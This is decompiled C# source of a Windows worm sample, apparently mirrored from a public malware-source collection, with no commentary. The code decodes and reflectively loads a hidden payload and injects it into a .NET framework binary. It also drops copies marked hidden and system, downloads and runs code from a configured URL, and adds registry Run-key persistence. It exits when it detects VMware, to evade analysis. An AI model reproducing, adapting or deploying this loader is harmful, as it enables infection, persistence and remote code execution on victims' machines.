mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
562 lines
27 KiB
C#
562 lines
27 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Tm2tqtua3sspuhohl2o5frgcxkwutet2c.Xcpjaqmaubj2y0o3n
|
|
// Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 5406B450-382A-49C3-BEAD-27BB328AB378
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-6d5fef800026555b0865a8fd9ba051fda07985211385e0bd92a5e9a77af03653.exe
|
|
|
|
using G1iw5jvdvf5jyuwmtz03k02vp;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.IO.Compression;
|
|
using System.Management;
|
|
using System.Net;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
|
|
namespace Tm2tqtua3sspuhohl2o5frgcxkwutet2c
|
|
{
|
|
public class Xcpjaqmaubj2y0o3n
|
|
{
|
|
private static bool Vyydwy2dzohvetixn = true;
|
|
private byte[] Xvzsy20ikq50fiuzzzsw14i22;
|
|
private bool n2gipyxzj1jd3ijqb;
|
|
private string fzeil4ihxre2gqh3ygpyffp15;
|
|
private string qw2lxynmeozut0doo;
|
|
private string Cllbarbs03nsn03hk0bknvl3n = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private int I12ss4uzgimbzl5qa;
|
|
private int dluh54iqwipbeun4nsizlk3foyfinw5wt;
|
|
private int Hgmfkbt4atcy55dirqkgtdkb5;
|
|
private string Dx4pxl4hlvcwokaeq = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("XRO");
|
|
private string zyygx4b4iahtt0izd = string.Empty;
|
|
private string Q5aj14jzmb5gozvrp = string.Empty;
|
|
private int Sqsgcrexehem0lg3mionbxiuw;
|
|
private string Qeujo4xlzlmqxzlwt = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string N4rfcpacyzvdyb5o5pseuwja0 = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string ovvhzz3v4t0lncqhc = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string Yu13rcd5iimiqemzz = string.Empty;
|
|
private string Ouyjahe11vseyu1gc = string.Empty;
|
|
private string Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = string.Empty;
|
|
private string wlzgy5x503ocrxvto = string.Empty;
|
|
private string mlzo2db1vixlaay2xx3qm1uh1 = string.Empty;
|
|
private string Ifbnriw30u3zqko1o = string.Empty;
|
|
private string O52jpa3c1kjywan03 = string.Empty;
|
|
private string aebl4g0r22vys142j542rkxik = string.Empty;
|
|
private string Pi5xwja3tpz1vyvxe0bvaszsw = string.Empty;
|
|
private string W0igi2snxiuevrujvdeszp1bxkguemxod = string.Empty;
|
|
private string Osbrxysckqx0aqx1lzguqifvs = string.Empty;
|
|
private bool Zx2ycojwb320y2n31;
|
|
private bool Kbkqxyuop35q5nercdcrjitsn;
|
|
private string Ueczuk1jlbi3nbg5x2h1wuon0 = string.Empty;
|
|
private string Ne4uiww2g1iuhqrgv = string.Empty;
|
|
private bool waiw3pzzuvdgyn5dx3idhqwhncujkp40q;
|
|
private string upzpncz1hdeloi5k3rlq4a14w = string.Empty;
|
|
private string ogs5wi51r3m1bqoyn = string.Empty;
|
|
private string Fl1t0wgsikf4mpxykcardit3b = string.Empty;
|
|
private string Abfzh2zlzdzdgmqoqnumemerp = string.Empty;
|
|
private bool etx2nx1n4akedmv4fu2mqzcc0;
|
|
private bool Dwfbus3rr2dghn14mxukem4jr;
|
|
private bool Bm3illttk5nwmenvbn3jbmios;
|
|
private bool s1rnoof103dimlt4vbd0kazwizm4euy4s;
|
|
private object Rebbtyainmzrpdxrpkhemquuf;
|
|
private MethodInfo Fau0pig3abdcym2njphkzgkxl;
|
|
|
|
private void xpjiguggif5df23oi(string xkcps1zic2cskbd1y)
|
|
{
|
|
string[] separator1 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rpspaujmfcfeku02tmvpfrcod")
|
|
};
|
|
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
|
|
string[] separator2 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vmh2pox3hvii1ls52")
|
|
};
|
|
string[] strArray2 = xkcps1zic2cskbd1y.Split(separator2, StringSplitOptions.None);
|
|
string[] separator3 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("uo3midvthz4usmhbcddxzwvg4")
|
|
};
|
|
string[] strArray3 = xkcps1zic2cskbd1y.Split(separator3, StringSplitOptions.None);
|
|
string[] separator4 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("hzoym5z0i1xmrfcmygv11yqya")
|
|
};
|
|
string[] strArray4 = xkcps1zic2cskbd1y.Split(separator4, StringSplitOptions.None);
|
|
this.Cllbarbs03nsn03hk0bknvl3n = strArray1[1];
|
|
this.fzeil4ihxre2gqh3ygpyffp15 = strArray1[2];
|
|
this.qw2lxynmeozut0doo = strArray1[3];
|
|
this.I12ss4uzgimbzl5qa = Convert.ToInt32(strArray1[4]);
|
|
this.dluh54iqwipbeun4nsizlk3foyfinw5wt = Convert.ToInt32(strArray1[5]);
|
|
this.Hgmfkbt4atcy55dirqkgtdkb5 = Convert.ToInt32(strArray1[6]);
|
|
this.Dx4pxl4hlvcwokaeq = strArray2[1];
|
|
this.zyygx4b4iahtt0izd = strArray2[2];
|
|
this.Q5aj14jzmb5gozvrp = strArray2[3];
|
|
this.Sqsgcrexehem0lg3mionbxiuw = Convert.ToInt32(strArray3[1]);
|
|
this.Qeujo4xlzlmqxzlwt = strArray3[2];
|
|
this.N4rfcpacyzvdyb5o5pseuwja0 = strArray3[3];
|
|
this.ovvhzz3v4t0lncqhc = strArray3[4];
|
|
this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = strArray3[5];
|
|
this.Yu13rcd5iimiqemzz = strArray3[6];
|
|
this.Ouyjahe11vseyu1gc = strArray3[7];
|
|
this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = strArray3[8];
|
|
this.wlzgy5x503ocrxvto = strArray3[9];
|
|
this.mlzo2db1vixlaay2xx3qm1uh1 = strArray3[10];
|
|
this.Ifbnriw30u3zqko1o = strArray3[11];
|
|
this.O52jpa3c1kjywan03 = this.bxmgxqvn0tzn2pwdo5ezgxkdh(strArray3[12]);
|
|
this.aebl4g0r22vys142j542rkxik = strArray3[13];
|
|
this.Pi5xwja3tpz1vyvxe0bvaszsw = strArray3[14];
|
|
this.W0igi2snxiuevrujvdeszp1bxkguemxod = strArray3[15];
|
|
this.Zx2ycojwb320y2n31 = Convert.ToBoolean(strArray3[16]);
|
|
this.Kbkqxyuop35q5nercdcrjitsn = Convert.ToBoolean(strArray3[17]);
|
|
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.yti5olupwaivlclet(strArray3[18]) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + Path.GetRandomFileName();
|
|
this.Osbrxysckqx0aqx1lzguqifvs = strArray3[19];
|
|
this.Ne4uiww2g1iuhqrgv = strArray3[20];
|
|
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.Ueczuk1jlbi3nbg5x2h1wuon0.Substring(0, this.Ueczuk1jlbi3nbg5x2h1wuon0.Length - 4) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss(".xee");
|
|
Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
|
|
switch (this.Ne4uiww2g1iuhqrgv)
|
|
{
|
|
case "0":
|
|
try
|
|
{
|
|
this.Ne4uiww2g1iuhqrgv = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr6\\20577vceeMcootNTFaeok4v..02\\b.x") : Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577vceeMcootNTFaeokv..02\\b.x");
|
|
break;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
break;
|
|
}
|
|
case "1":
|
|
this.Ne4uiww2g1iuhqrgv = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577cceeMcootNTFaeokv..02\\s.x");
|
|
break;
|
|
}
|
|
this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q = Convert.ToBoolean(strArray4[1]);
|
|
this.upzpncz1hdeloi5k3rlq4a14w = strArray4[2];
|
|
this.ogs5wi51r3m1bqoyn = strArray4[3];
|
|
this.Fl1t0wgsikf4mpxykcardit3b = strArray4[4];
|
|
this.Abfzh2zlzdzdgmqoqnumemerp = strArray4[5];
|
|
this.etx2nx1n4akedmv4fu2mqzcc0 = Convert.ToBoolean(strArray4[6]);
|
|
this.Dwfbus3rr2dghn14mxukem4jr = Convert.ToBoolean(strArray4[7]);
|
|
this.Bm3illttk5nwmenvbn3jbmios = Convert.ToBoolean(strArray4[8]);
|
|
this.s1rnoof103dimlt4vbd0kazwizm4euy4s = Convert.ToBoolean(strArray4[9]);
|
|
this.Fl1t0wgsikf4mpxykcardit3b = this.yti5olupwaivlclet(this.Fl1t0wgsikf4mpxykcardit3b);
|
|
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
|
|
{
|
|
MessageBoxButtons.OK,
|
|
MessageBoxButtons.OKCancel,
|
|
MessageBoxButtons.YesNo,
|
|
MessageBoxButtons.YesNoCancel,
|
|
MessageBoxButtons.RetryCancel,
|
|
MessageBoxButtons.AbortRetryIgnore
|
|
};
|
|
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
|
|
{
|
|
MessageBoxIcon.Hand,
|
|
MessageBoxIcon.Asterisk,
|
|
MessageBoxIcon.Question,
|
|
MessageBoxIcon.Exclamation,
|
|
MessageBoxIcon.None
|
|
};
|
|
if (!(this.Cllbarbs03nsn03hk0bknvl3n == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
|
|
return;
|
|
Thread.Sleep(this.Hgmfkbt4atcy55dirqkgtdkb5 * 1000);
|
|
int num = (int) MessageBox.Show(this.fzeil4ihxre2gqh3ygpyffp15, this.qw2lxynmeozut0doo, messageBoxButtonsArray[this.I12ss4uzgimbzl5qa], messageBoxIconArray[this.dluh54iqwipbeun4nsizlk3foyfinw5wt]);
|
|
}
|
|
|
|
private byte[] T20r4skkjzxet5xxndjdxm23nq1de3ste(
|
|
byte[] j53vpo23pks1sawtewkqd4g3v,
|
|
int wtxw3dfyzvb2m5edzmygxag3t)
|
|
{
|
|
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(j53vpo23pks1sawtewkqd4g3v), CompressionMode.Decompress);
|
|
byte[] buffer = new byte[wtxw3dfyzvb2m5edzmygxag3t];
|
|
gzipStream.Read(buffer, 0, buffer.Length);
|
|
return buffer;
|
|
}
|
|
|
|
private object Ceyweulgsxaof4hwmnwokglbk(int mn0yawr33ammr4eax42s3tcgr)
|
|
{
|
|
Assembly assembly = Assembly.Load(Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(Xcpjaqmaubj2y0o3n.q1cagpbvwn04kmqyi(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rnEdluP.l"))));
|
|
Thread.Sleep(1000);
|
|
System.Type type = assembly.GetTypes()[mn0yawr33ammr4eax42s3tcgr];
|
|
this.Fau0pig3abdcym2njphkzgkxl = type.GetMethod(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Rnu"));
|
|
return Activator.CreateInstance(type);
|
|
}
|
|
|
|
private void persistenceStartup(
|
|
string Ymom4ixsncavvmzwlpzsuuw3j,
|
|
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
|
|
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x)
|
|
{
|
|
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true);
|
|
bool flag = true;
|
|
while (flag)
|
|
{
|
|
Application.DoEvents();
|
|
if (registryKey.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\a1adcpdsq0gn123io4m1f55gxptbkhd2e")) == null)
|
|
registryKey.SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
Thread.Sleep(2000);
|
|
}
|
|
}
|
|
|
|
private byte[] P2dz552iekyo3s3by(byte[] xkcps1zic2cskbd1y)
|
|
{
|
|
if (this.Dx4pxl4hlvcwokaeq == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("xro"))
|
|
xkcps1zic2cskbd1y = Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(xkcps1zic2cskbd1y);
|
|
return xkcps1zic2cskbd1y;
|
|
}
|
|
|
|
private void fyld3x5pir2kaoksligurapzj(byte[] Cplqgntbylcl1knxmqpm2hjar)
|
|
{
|
|
try
|
|
{
|
|
if (this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
|
|
{
|
|
try
|
|
{
|
|
if (!this.Qhlb0achfvgjxeekj(Cplqgntbylcl1knxmqpm2hjar))
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) Cplqgntbylcl1knxmqpm2hjar,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
null
|
|
});
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
string tempFileName = Path.GetTempFileName();
|
|
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, tempFileName, true);
|
|
}
|
|
}
|
|
if (!(this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
|
|
return;
|
|
string str = this.Fl1t0wgsikf4mpxykcardit3b + this.Abfzh2zlzdzdgmqoqnumemerp;
|
|
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, str, true);
|
|
if (this.etx2nx1n4akedmv4fu2mqzcc0)
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
|
|
if (this.Dwfbus3rr2dghn14mxukem4jr)
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
|
|
if (!this.Bm3illttk5nwmenvbn3jbmios)
|
|
return;
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
}
|
|
}
|
|
|
|
private bool Qhlb0achfvgjxeekj(byte[] Zq0k51bndsjftafxi)
|
|
{
|
|
Xcpjaqmaubj2y0o3n.ooaqlrxjthzq5ykyeqamxwsxh(Zq0k51bndsjftafxi);
|
|
bool vyydwy2dzohvetixn = Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn;
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = true;
|
|
return vyydwy2dzohvetixn;
|
|
}
|
|
|
|
private void Xu4noszs2jndqy0uakulzk0hj(
|
|
byte[] iz1q112gcqzev5oqr,
|
|
string Dutorh5b0eqbkqejp,
|
|
bool Fc4ucvsrmmkck30rx)
|
|
{
|
|
try
|
|
{
|
|
System.IO.File.WriteAllBytes(Dutorh5b0eqbkqejp, iz1q112gcqzev5oqr);
|
|
if (!Fc4ucvsrmmkck30rx)
|
|
return;
|
|
new Process()
|
|
{
|
|
StartInfo = {
|
|
FileName = Dutorh5b0eqbkqejp
|
|
}
|
|
}.Start();
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
private byte[] idbm12rhs0k0m25by(
|
|
string V3ih4ivpcexzrkelfjctk5bov,
|
|
int Wi2vtkb2qd4j53iy5fbdxtgmp,
|
|
string k0vs32obabddwwiqnt4br14zo)
|
|
{
|
|
try
|
|
{
|
|
IntPtr hModule = Mvsaeg2eeoaqx3utk.cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string.Empty);
|
|
IntPtr hResInfo = Mvsaeg2eeoaqx3utk.Nyja0dryfvflph11ok4ga5zpz(hModule, Wi2vtkb2qd4j53iy5fbdxtgmp, k0vs32obabddwwiqnt4br14zo);
|
|
uint length = Mvsaeg2eeoaqx3utk.Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(hModule, hResInfo);
|
|
IntPtr source = Mvsaeg2eeoaqx3utk.Xpo3aq0mxqyvzr1zld5qguuzg(hModule, hResInfo);
|
|
byte[] destination = new byte[(IntPtr) length];
|
|
Marshal.Copy(source, destination, 0, (int) length);
|
|
return destination;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errraigrsuc:ro edn eore ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
|
|
return (byte[]) null;
|
|
}
|
|
}
|
|
|
|
private void Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(
|
|
string Ymom4ixsncavvmzwlpzsuuw3j,
|
|
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
|
|
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x,
|
|
int lglb5oxkofx5lhfsdpmd3oohjsw1nlznk)
|
|
{
|
|
this.n2gipyxzj1jd3ijqb = true;
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 1)
|
|
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 2)
|
|
Registry.LocalMachine.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk != 3)
|
|
return;
|
|
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie);
|
|
subKey.SetValue(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SuPttbah"), (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
subKey.Close();
|
|
if (Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, true) == null)
|
|
return;
|
|
Registry.CurrentUser.DeleteSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, false);
|
|
}
|
|
|
|
private string bxmgxqvn0tzn2pwdo5ezgxkdh(string Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3)
|
|
{
|
|
string str = string.Empty;
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
|
|
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
str = Path.GetTempPath();
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("2"))
|
|
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
return str;
|
|
}
|
|
|
|
public void bocln5xhicnup1rlmeg3v0wq5fq30ikg2()
|
|
{
|
|
string executablePath = Application.ExecutablePath;
|
|
try
|
|
{
|
|
this.xpjiguggif5df23oi(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 16, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("CCSI0IZJHGS1OVNFRTEN3VJ02"))));
|
|
this.Xvzsy20ikq50fiuzzzsw14i22 = this.idbm12rhs0k0m25by(executablePath, 44, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("BUEVDVEHTVBYWB1VY0OFU1FDB"));
|
|
if (this.Qeujo4xlzlmqxzlwt == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Xvzsy20ikq50fiuzzzsw14i22 = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(this.Xvzsy20ikq50fiuzzzsw14i22, this.Sqsgcrexehem0lg3mionbxiuw);
|
|
this.Xvzsy20ikq50fiuzzzsw14i22 = this.P2dz552iekyo3s3by(this.Xvzsy20ikq50fiuzzzsw14i22);
|
|
if (!this.Zx2ycojwb320y2n31)
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) this.Xvzsy20ikq50fiuzzzsw14i22,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
(object) Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("")
|
|
});
|
|
}
|
|
else
|
|
this.Qhlb0achfvgjxeekj(this.Xvzsy20ikq50fiuzzzsw14i22);
|
|
if (this.Kbkqxyuop35q5nercdcrjitsn)
|
|
this.Xu4noszs2jndqy0uakulzk0hj(this.Xvzsy20ikq50fiuzzzsw14i22, this.Ueczuk1jlbi3nbg5x2h1wuon0, true);
|
|
string str;
|
|
if (!string.IsNullOrEmpty(this.Osbrxysckqx0aqx1lzguqifvs))
|
|
{
|
|
str = this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + this.Ifbnriw30u3zqko1o;
|
|
Directory.CreateDirectory(this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs);
|
|
}
|
|
else
|
|
str = this.O52jpa3c1kjywan03 + this.Ifbnriw30u3zqko1o;
|
|
if (this.N4rfcpacyzvdyb5o5pseuwja0 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str, 1);
|
|
if (this.ovvhzz3v4t0lncqhc == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.wlzgy5x503ocrxvto, str, 2);
|
|
if (this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Ouyjahe11vseyu1gc, this.mlzo2db1vixlaay2xx3qm1uh1, str, 3);
|
|
if (this.n2gipyxzj1jd3ijqb)
|
|
{
|
|
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
|
|
if (!System.IO.File.Exists(str))
|
|
System.IO.File.WriteAllBytes(str, bytes);
|
|
if (System.IO.File.Exists(str))
|
|
{
|
|
if (this.aebl4g0r22vys142j542rkxik == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
|
|
if (this.Pi5xwja3tpz1vyvxe0bvaszsw == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
|
|
if (this.W0igi2snxiuevrujvdeszp1bxkguemxod == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
|
|
}
|
|
}
|
|
this.ulry4uhtwnw50g04z(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 47, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("AHAAJWFXQRWK55DBF5CZOY25NAJ1XU0TF"))));
|
|
if (this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q)
|
|
this.fyld3x5pir2kaoksligurapzj(new WebClient().DownloadData(new Uri(this.upzpncz1hdeloi5k3rlq4a14w)));
|
|
this.persistenceStartup(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(ex.Message);
|
|
}
|
|
}
|
|
|
|
private static void pq0wico5ukmaxyfwlssnrl0r1nqartkt4(object Qilit4odml3450ffdduw5begg)
|
|
{
|
|
try
|
|
{
|
|
MethodInfo entryPoint = Assembly.Load((byte[]) Qilit4odml3450ffdduw5begg).EntryPoint;
|
|
if (entryPoint.GetParameters().Length == 1)
|
|
entryPoint.Invoke((object) null, new object[1]
|
|
{
|
|
(object) new string[0]
|
|
});
|
|
else
|
|
entryPoint.Invoke((object) null, (object[]) null);
|
|
}
|
|
catch
|
|
{
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
|
|
}
|
|
}
|
|
|
|
public static byte[] q1cagpbvwn04kmqyi(string lhs5nwmsu4p3h3rgf)
|
|
{
|
|
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(lhs5nwmsu4p3h3rgf))
|
|
{
|
|
byte[] buffer = new byte[1024];
|
|
using (MemoryStream memoryStream = new MemoryStream())
|
|
{
|
|
while (true)
|
|
{
|
|
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
|
|
if (count > 0)
|
|
memoryStream.Write(buffer, 0, count);
|
|
else
|
|
break;
|
|
}
|
|
return memoryStream.ToArray();
|
|
}
|
|
}
|
|
}
|
|
|
|
[DllImport("kernel32.dll")]
|
|
public static extern IntPtr GetModuleHandle(string lpModuleName);
|
|
|
|
private static void Main(string[] args)
|
|
{
|
|
string empty = string.Empty;
|
|
foreach (ManagementBaseObject instance in new ManagementClass(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Wn2Boi3_is")).GetInstances())
|
|
{
|
|
if (instance.Properties[Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Sranmeeilubr")].Value.ToString().Trim().ToLower().IndexOf(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vwrmae")) > -1)
|
|
{
|
|
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u navrulmcieevrnethsapiaincno erni ita ahn niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("VrulMcieDtceita ahn eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
|
|
Environment.Exit(0);
|
|
}
|
|
}
|
|
